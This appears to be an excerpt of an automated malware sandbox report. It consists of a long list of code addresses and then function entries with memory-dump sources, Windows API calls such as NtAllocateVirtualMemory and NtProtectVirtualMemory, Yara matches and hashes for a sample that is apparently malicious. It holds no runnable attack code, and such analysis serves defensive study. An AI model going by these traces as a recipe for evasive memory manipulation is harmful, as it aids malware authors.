                    0x00401517
                    0x00401519
                    0x0040151b
                    0x00401522
                    0x00401523
                    0x00401525
                    0x00401527
                    0x0040152d
                    0x0040152f
                    0x00401531
                    0x00401533
                    0x00401535
                    0x00401537
                    0x0040153e
                    0x00401540
                    0x00401546
                    0x00401548
                    0x0040154a
                    0x0040154c
                    0x0040154e
                    0x00401550
                    0x00401552
                    0x00401554
                    0x00401555
                    0x00401558
                    0x0040155e
                    0x00401560
                    0x00401564
                    0x00401566
                    0x00401568
                    0x0040156a
                    0x0040156c
                    0x0040156e
                    0x00401570
                    0x00401572
                    0x00401573
                    0x00401575
                    0x0040157b
                    0x0040157d
                    0x0040157f
                    0x00401581
                    0x00401583
                    0x00401585
                    0x00401585
                    0x00401587
                    0x00401589
                    0x0040158b
                    0x0040158f
                    0x00401592
                    0x00401593
                    0x00401595
                    0x00401597
                    0x00401599
                    0x0040159b
                    0x0040159d
                    0x0040159f
                    0x004015a1
                    0x004015a3
                    0x004015a5
                    0x004015a7
                    0x004015ae
                    0x004015b0
                    0x004015b6
                    0x004015b8
                    0x004015ba
                    0x004015bc
                    0x004015be
                    0x004015be
                    0x004015bf
                    0x004015c1
                    0x004015c3
                    0x004015c6
                    0x004015c7
                    0x004015cc
                    0x004015cc
                    0x004015ce
                    0x004015d0
                    0x004015d6
                    0x004015d8
                    0x004015da
                    0x004015dc
                    0x004015de
                    0x004015e0
                    0x004015e2
                    0x004015e3
                    0x004015e5
                    0x004015e7
                    0x004015e9
                    0x004015ee
                    0x004015f0
                    0x004015f2
                    0x004015f4
                    0x004015f6
                    0x004015f8
                    0x004015fa
                    0x004015fc
                    0x004015fe
                    0x004015ff
                    0x00401605
                    0x00401609
                    0x00401609
                    0x0040160a
                    0x0040160c
                    0x0040160e
                    0x00401610
                    0x00401612
                    0x00401614
                    0x00401616
                    0x00401618
                    0x0040161a
                    0x0040161b
                    0x0040161d
                    0x0040161f
                    0x00401621
                    0x00401626
                    0x00401628
                    0x0040162a
                    0x0040162c
                    0x0040162e
                    0x00401630
                    0x00401632
                    0x00401634
                    0x00401635
                    0x00401635
                    0x0040163a
                    0x0040163b
                    0x0040163d
                    0x0040163f
                    0x00401642
                    0x00401644
                    0x00401646
                    0x00401648
                    0x0040164a
                    0x0040164c
                    0x0040164e
                    0x00401650
                    0x00401651
                    0x00401652
                    0x00401653
                    0x00401655
                    0x00401657
                    0x00401659
                    0x0040165e
                    0x00401660
                    0x00401662
                    0x00401664
                    0x00401666
                    0x00401668
                    0x0040166a
                    0x0040166c
                    0x0040166e
                    0x0040166f
                    0x00401672
                    0x00401673
                    0x00401675
                    0x00401677
                    0x0040167d
                    0x0040167f
                    0x00401681
                    0x00401683
                    0x00401685
                    0x00401687
                    0x0040168e
                    0x00401693
                    0x00401695
                    0x00401695
                    0x00401697
                    0x00401699
                    0x0040169b
                    0x0040169d
                    0x0040169f
                    0x004016a1
                    0x004016a3
                    0x004016a7
                    0x004016ab
                    0x004016ad
                    0x004016af
                    0x004016b1
                    0x004016b2
                    0x004016b3
                    0x004016b3
                    0x004016b5
                    0x004016b7
                    0x004016b9
                    0x004016bb
                    0x004016bd
                    0x004016c1
                    0x004016c2
                    0x004016c3
                    0x004016c5
                    0x004016c8
                    0x004016ce
                    0x004016d0
                    0x004016d2
                    0x004016d4
                    0x004016d6
                    0x004016d8
                    0x004016da
                    0x004016dc
                    0x004016de
                    0x004016df
                    0x004016e3
                    0x004016e5
                    0x004016e7
                    0x004016e9
                    0x004016e9
                    0x004016ea
                    0x004016ec
                    0x004016ee
                    0x004016f0
                    0x004016f2
                    0x004016f4
                    0x004016f6
                    0x004016f8
                    0x004016f9
                    0x004016fa
                    0x004016fb
                    0x004016fd
                    0x004016ff
                    0x00401701
                    0x00401706
                    0x00401708
                    0x0040170a
                    0x0040170c
                    0x0040170e
                    0x00401710
                    0x00401712
                    0x00401714
                    0x00401715
                    0x0040171e
                    0x0040171e
                    0x00401722
                    0x00401724
                    0x00401726
                    0x00401728
                    0x0040172a
                    0x0040172c
                    0x0040172e
                    0x00401732
                    0x00401733
                    0x00401735
                    0x00401737
                    0x00401739
                    0x0040173e
                    0x00401740
                    0x00401742
                    0x00401744
                    0x00401746
                    0x00401748
                    0x0040174a
                    0x0040174c
                    0x0040174d
                    0x00401752
                    0x00401753
                    0x00401755
                    0x00401757
                    0x0040175d
                    0x0040175f
                    0x00401761
                    0x00401763
                    0x00401765
                    0x00401767
                    0x0040176b
                    0x0040176d
                    0x0040176f
                    0x00401771
                    0x00401776
                    0x00401778
                    0x0040177a
                    0x0040177c
                    0x0040177e
                    0x00401780
                    0x00401782
                    0x00401784
                    0x00401786
                    0x00401787
                    0x0040178a
                    0x0040178b
                    0x0040178d
                    0x0040178f
                    0x00401792
                    0x00401794
                    0x00401796
                    0x00401798
                    0x0040179a
                    0x0040179c
                    0x0040179e
                    0x004017a0
                    0x004017a1
                    0x004017a2
                    0x004017a3
                    0x004017a5
                    0x004017ab
                    0x004017ab
                    0x004017ac
                    0x004017ae
                    0x004017b0
                    0x004017b2
                    0x004017b4
                    0x004017b6
                    0x004017b8
                    0x004017ba
                    0x004017bc
                    0x004017bd
                    0x004017c1
                    0x004017c2
                    0x004017c3
                    0x004017c5
                    0x004017c7
                    0x004017c9
                    0x004017cb
                    0x004017cd
                    0x004017cf
                    0x004017d1
                    0x004017d3
                    0x004017d5
                    0x004017d9
                    0x004017da
                    0x004017db
                    0x004017dd
                    0x004017e0
                    0x004017e6
                    0x004017e8
                    0x004017ea
                    0x004017ec
                    0x004017ee
                    0x004017ee
                    0x004017ef
                    0x004017f1
                    0x004017f3
                    0x004017fa
                    0x004017fb
                    0x004017fd
                    0x004017ff
                    0x00401802
                    0x00401804
                    0x00401806
                    0x00401808
                    0x0040180a
                    0x0040180c
                    0x0040180e
                    0x00401810
                    0x00401812
                    0x00401813
                    0x00401815
                    0x00401817
                    0x00401819
                    0x0040181e
                    0x00401820
                    0x00401822
                    0x00401824
                    0x00401826
                    0x00401828
                    0x0040182a
                    0x0040182c
                    0x0040182d
                    0x0040182e
                    0x0040182f
                    0x00401835
                    0x00401837
                    0x00401839
                    0x0040183b
                    0x0040183d
                    0x0040183f
                    0x00401841
                    0x00401843
                    0x00401845
                    0x00401847
                    0x0040184b
                    0x0040184d
                    0x00401850
                    0x00401856
                    0x00401858
                    0x0040185a
                    0x0040185c
                    0x0040185e
                    0x0040185e
                    0x0040185f
                    0x00401861
                    0x00401863
                    0x00401866
                    0x00401867
                    0x0040186a
                    0x0040186b
                    0x0040186d
                    0x0040186f
                    0x00401872
                    0x00401874
                    0x00401876
                    0x00401878
                    0x0040187a
                    0x0040187c
                    0x0040187e
                    0x00401882
                    0x00401883
                    0x00401885
                    0x00401887
                    0x00401889
                    0x0040188e
                    0x00401890
                    0x00401892
                    0x00401894
                    0x00401896
                    0x00401898
                    0x0040189a
                    0x0040189e
                    0x0040189f
                    0x004018a4
                    0x004018a4
                    0x004018a6
                    0x004018a8
                    0x004018a9
                    0x004018ab
                    0x004018ad
                    0x004018af
                    0x004018b1
                    0x004018b3
                    0x004018b5
                    0x004018b7
                    0x004018be
                    0x004018c0
                    0x004018c6
                    0x004018c8
                    0x004018ca
                    0x004018cc
                    0x004018ce
                    0x004018ce
                    0x004018cf
                    0x004018d1
                    0x004018d3
                    0x004018da
                    0x004018db
                    0x004018dd
                    0x004018df
                    0x004018e1
                    0x00000000
                    0x00000000
                    0x004018e3
                    0x004018e5
                    0x004018e7
                    0x004018e9
                    0x004018eb
                    0x004018ed
                    0x004018ef
                    0x004018f1
                    0x004018f4
                    0x004018f5
                    0x004018f7
                    0x004018f9
                    0x00000000
                    0x004018fb
                    0x004018fb
                    0x004018fc
                    0x004018fd
                    0x004018ff
                    0x00401900
                    0x00401905
                    0x00401905
                    0x00000000
                    0x004018f9
                    0x00401907
                    0x00401908
                    0x0040190a
                    0x0040190c
                    0x0040190e
                    0x00401910
                    0x00401912
                    0x00401914
                    0x00401916
                    0x00401918
                    0x0040191a
                    0x0040191c
                    0x0040191e
                    0x00401920
                    0x00401922
                    0x00401924
                    0x00401926
                    0x00401927
                    0x00401927
                    0x00401929
                    0x0040192b
                    0x0040192d
                    0x0040192f
                    0x00401931
                    0x00401933
                    0x00401939
                    0x0040193b
                    0x0040193d
                    0x00401940
                    0x00401941
                    0x00401943
                    0x00401946
                    0x00401946
                    0x00401948
                    0x00000000
                    0x00000000
                    0x0040194a
                    0x00000000
                    0x0040194c
                    0x0040194c
                    0x0040194e
                    0x00401953
                    0x00401956
                    0x00401958
                    0x0040195a
                    0x0040195c
                    0x0040195e
                    0x00401960
                    0x00401962
                    0x00401964
                    0x00401966
                    0x00401968
                    0x0040196a
                    0x0040196c
                    0x0040196e
                    0x00401970
                    0x00401972
                    0x00401974
                    0x00401976
                    0x00401978
                    0x0040197a
                    0x0040197c
                    0x0040197e
                    0x00401980
                    0x00401982
                    0x00401984
                    0x00401989
                    0x0040198b
                    0x0040198f
                    0x0040198f
                    0x00000000
                    0x0040194a
                    0x00401993
                    0x00401996
                    0x0040199b
                    0x0040199d
                    0x0040199f
                    0x004019a1
                    0x004019a3
                    0x004019a5
                    0x004019a7
                    0x004019aa
                    0x004019ac
                    0x004019ae
                    0x004019b0
                    0x004019b2
                    0x004019b4
                    0x004019b8
                    0x004019ba
                    0x004019bc
                    0x004019be
                    0x004019c0
                    0x004019c2
                    0x004019c4
                    0x004019c6
                    0x004019c7
                    0x004019c9
                    0x004019ca
                    0x004019cc
                    0x004019ce
                    0x004019d0
                    0x004019d2
                    0x004019d4
                    0x004019d6
                    0x004019d8
                    0x004019da
                    0x004019da
                    0x004019e1
                    0x004019e6
                    0x004019e7
                    0x004019ee
                    0x004019f0
                    0x004019f0
                    0x004019f2
                    0x004019f4
                    0x004019f4
                    0x004019f5
                    0x004019f7
                    0x004019fd
                    0x004019ff
                    0x00401a01
                    0x00401a03
                    0x00401a05
                    0x00401a07
                    0x00401a09
                    0x00401a0b
                    0x00401a0b
                    0x00401a0e
                    0x00401a7d
                    0x00401a7d
                    0x00401a7f
                    0x00401a86
                    0x00000000
                    0x00401a10
                    0x00401a10
                    0x00401a11
                    0x00401a12
                    0x00401a14
                    0x00401a15
                    0x00401a16
                    0x00401a17
                    0x00401a18
                    0x00401a19
                    0x00401a19
                    0x00401a1c

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378065024.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.378057635.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.378082997.0000000000419000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.378091336.000000000041B000.00000002.00020000.sdmp
                    Similarity
                    • API ID: #100
                    • String ID: VB5!6&*
                    • API String ID: 1341478452-3593831657
                    • Opcode ID: 0a816da0a65d68f3bb7e889559adb082e285275b811bbc9eef6c15ca525dd6fb
                    • Instruction ID: b56237a25a1983eca975bf346f4b9c8585693fc58b155836408167f7e9440dda
                    • Opcode Fuzzy Hash: 0a816da0a65d68f3bb7e889559adb082e285275b811bbc9eef6c15ca525dd6fb
                    • Instruction Fuzzy Hash: A781593144E7C08FD3034BB899B91A5BFB0AE1722071A06EBC4C2DF5B3D12C595AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Executed Functions

                    Memory Dump Source
                    • Source File: 0000000C.00000002.506796536.00000000017AF000.00000040.00000001.sdmp, Offset: 017AF000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efb2c83050589a8eb8a9f1545c366b5d68573f61ab9fdba1d8f0fd711f9dfd3c
                    • Instruction ID: a94516e456bdefbae4c441204b4b7bc0c64bef0e2b274796aa0724753e37bb6b
                    • Opcode Fuzzy Hash: efb2c83050589a8eb8a9f1545c366b5d68573f61ab9fdba1d8f0fd711f9dfd3c
                    • Instruction Fuzzy Hash: 47411830A083828FCF179F2481643DAFFE3AF82219F8943D9D5558A153E33582C2CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TerminateThread.KERNEL32(F5DF7ED1), ref: 017AFA5D
                    Memory Dump Source
                    • Source File: 0000000C.00000002.506796536.00000000017AF000.00000040.00000001.sdmp, Offset: 017AF000, based on PE: false
                    Similarity
                    • API ID: TerminateThread
                    • String ID:
                    • API String ID: 1852365436-0
                    • Opcode ID: b8f22c4ce5452105bf6adbd89093a9063c7529f52ca07f13c73c4877f420786e
                    • Instruction ID: 118571e43810fdd6f2749eb65e5645640ceaed69b8424974d7d55b15199fb707
                    • Opcode Fuzzy Hash: b8f22c4ce5452105bf6adbd89093a9063c7529f52ca07f13c73c4877f420786e
                    • Instruction Fuzzy Hash: 1A31C3315043068FDB299F25C598BADF7E3AF82326F96839AD9590B1A2D33545C4CB43
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Executed Functions

                    APIs
                    • K32GetDeviceDriverBaseNameA.KERNEL32 ref: 017AF7DE
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: BaseDeviceDriverName
                    • String ID: 2ohk$BTh5$H+ $TY&P$ilg
                    • API String ID: 2335996259-2432864370
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 017ABD86: LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    • NtAllocateVirtualMemory.NTDLL(-39C891F3,?,DFF19AC1), ref: 017A9853
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateLibraryLoadMemoryVirtual
                    • String ID: 2ohk$BTh5$H+
                    • API String ID: 2616484454-2489862345
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileA.KERNELBASE(?,5B463FEE), ref: 017A93DE
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 017A95F9: NtAllocateVirtualMemory.NTDLL(-39C891F3,?,DFF19AC1), ref: 017A9853
                    • LdrInitializeThunk.NTDLL(6D72D74A,7E9A37E1,017AA82E,017A1CF5,?,?,?,?), ref: 017AA84C
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateInitializeMemoryThunkVirtual
                    • String ID:
                    • API String ID: 3902809231-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtProtectVirtualMemory.NTDLL(661EFB1B,?,?,?,?,017ADDF9,ABC772B1,017A7854), ref: 017AEC65
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • K32GetDeviceDriverBaseNameA.KERNEL32 ref: 017AF7DE
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: BaseDeviceDriverName
                    • String ID: TY&P$ilg
                    • API String ID: 2335996259-1856522987
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateCreateFileMemoryVirtual
                    • String ID:
                    • API String ID: 2773895085-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 017ABD86: LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    • CreateFileA.KERNELBASE(?,5B463FEE), ref: 017A93DE
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFileLibraryLoad
                    • String ID:
                    • API String ID: 2049390123-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(00000000,?,017A0EAA,?,16A23E24,BEBF01A6,017A02EB,C1A53C1F,017AAC55,00000000,017A01A4), ref: 017A0D2B
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(00000000,?,017A0EAA,?,16A23E24,BEBF01A6,017A02EB,C1A53C1F,017AAC55,00000000,017A01A4), ref: 017A0D2B
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNELBASE(?,8DB82309,?,017ADCD0,017A7854), ref: 017ABF6A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LibraryLoadMemoryProtectVirtual
                    • String ID: 2ohk$BTh5$H+ $wAp$w;p
                    • API String ID: 3389902171-3885850358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Offset: 017A0000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%